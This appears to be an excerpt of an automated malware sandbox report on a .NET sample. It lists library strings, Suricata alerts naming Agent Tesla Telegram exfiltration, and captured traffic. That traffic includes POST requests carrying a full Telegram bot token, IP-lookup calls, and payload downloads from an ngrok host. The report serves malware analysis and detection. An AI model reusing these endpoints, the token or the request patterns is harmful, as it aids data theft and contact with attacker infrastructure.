              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49707 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49708 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49708 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.5:49707 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49707 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49822 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.5:49707
              Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.5:49822 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49822 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49778 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49778 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.5:49822
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49833 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49833 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.5:49708
              Source: Network trafficSuricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.5:49778
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49993 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49992 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49767 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49997 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49996 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.5:49833
              Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.5:49767 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49767 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50003 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50004 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50000 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49997 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49992 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50009 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49996 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.5:49767
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49999 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50012 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50003 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50015 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50014 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50011 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50001 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50000 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50004 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50009 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50012 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49999 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49990 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50015 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50001 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50011 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49990 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50007 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50006 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50013 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50007 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50006 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50008 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50002 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50013 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49993 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50010 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50002 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49994 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50008 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49991 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50010 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49994 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49991 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49998 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50005 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49998 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49995 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50005 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49995 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50016 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50016 -> 149.154.167.220:443
              Uses the Telegram API (likely for C&C communication)
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd50fd7cec3be6Host: api.telegram.orgContent-Length: 971Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd510e292b104fHost: api.telegram.orgContent-Length: 912Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd50f95a4e2a64Host: api.telegram.orgContent-Length: 971Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd5108a399824dHost: api.telegram.orgContent-Length: 912Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd50f95f9c48d7Host: api.telegram.orgContent-Length: 971Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd510a0cec50c6Host: api.telegram.orgContent-Length: 912Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd5d31f9dcb229Host: api.telegram.orgContent-Length: 66496Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd563df02e18ffHost: api.telegram.orgContent-Length: 66699Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd6c1cb84d1689Host: api.telegram.orgContent-Length: 66488Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd6eeddd0e296dHost: api.telegram.orgContent-Length: 66488Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd6522beff5f0aHost: api.telegram.orgContent-Length: 66488Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd71c332c9539eHost: api.telegram.orgContent-Length: 66488Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd73db318d0f97Host: api.telegram.orgContent-Length: 66488Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd67a5afe26105Host: api.telegram.orgContent-Length: 66488Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd77d60012a77aHost: api.telegram.orgContent-Length: 66488Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd79ba4bbf7f60Host: api.telegram.orgContent-Length: 66488Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd7c7ea6e772a3Host: api.telegram.orgContent-Length: 71356Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd6d021c9dd24cHost: api.telegram.orgContent-Length: 66488Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd84ee588da49aHost: api.telegram.orgContent-Length: 66481Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd871f04c62b47Host: api.telegram.orgContent-Length: 66481Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd78284f97f23aHost: api.telegram.orgContent-Length: 66481Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd90e3b20fec41Host: api.telegram.orgContent-Length: 66481Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd95ab240b67d6Host: api.telegram.orgContent-Length: 66481Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd81d75b28d528Host: api.telegram.orgContent-Length: 66481Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd9fbed3a15e79Host: api.telegram.orgContent-Length: 66659Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dda430a7dc875eHost: api.telegram.orgContent-Length: 66474Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dda7927d4fb1b6Host: api.telegram.orgContent-Length: 66474Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd932e1414c9adHost: api.telegram.orgContent-Length: 66474Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8ddb20456626a77Host: api.telegram.orgContent-Length: 66474Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd985bd704922fHost: api.telegram.orgContent-Length: 66474Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8ddb77cc655a0d3Host: api.telegram.orgContent-Length: 66474Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd50de0349e491Host: api.telegram.orgContent-Length: 66474Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd50de039af4a9Host: api.telegram.orgContent-Length: 70134Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: ip-api.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET //Winhost.pif HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: kvrcmhqc.ngrok.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET //Winhost.pif HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: kvrcmhqc.ngrok.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET //Winhost.pif HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: kvrcmhqc.ngrok.ioConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET //Winhost.pif HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: kvrcmhqc.ngrok.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET //Winhost.pif HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: kvrcmhqc.ngrok.ioConnection: Keep-Alive
